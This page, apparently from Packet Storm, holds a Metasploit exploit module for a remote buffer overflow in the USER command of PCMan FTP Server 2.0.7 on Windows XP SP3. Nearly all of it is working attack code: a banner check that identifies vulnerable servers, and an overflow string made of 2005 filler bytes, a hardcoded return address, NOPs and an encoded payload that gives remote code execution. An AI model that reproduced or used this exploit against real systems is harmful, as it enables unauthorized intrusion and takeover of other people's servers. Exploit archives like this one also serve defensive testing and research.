PCMan FTP Server version 2.0.7 remote buffer overflow exploit.
823e653d8a82b7def332d37498fc6aa74c4bd6b3c4d38913e525c15b1fff1e71# Exploit-DB Note: Ret needs adjustment for Windows XP SP3 English
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'PCMan\'s FTPD V2.0.7 Username Overflow',
'Description' => %q{
This module exploits a buffer overflow found in the USER command
of PCMan's FTPD.
},
'Author' => 'MSJ <matt.jones.85[at]gmail.com>',
'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Payload' =>
{
'Space' => 2005,
'BadChars' => "\x53\x93\x42\x7E",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
# Target 0
[
'Windows XP SP3 English',
{
'Ret' => 0x7e429353 # push esp, ret
}
]
],
'Default Target' => 0))
end
def check
connect
disconnect
if (banner =~ /220 PCMan\'s FTP Server 2\.0 Ready\./)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
print_status("Trying target #{target.name}...")
sploit = 'USER ' + "\x41" * 2005 + [target.ret].pack('V') + make_nops(16) + payload.encoded
send_cmd( [sploit] , false )
handler
disconnect
end
end
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed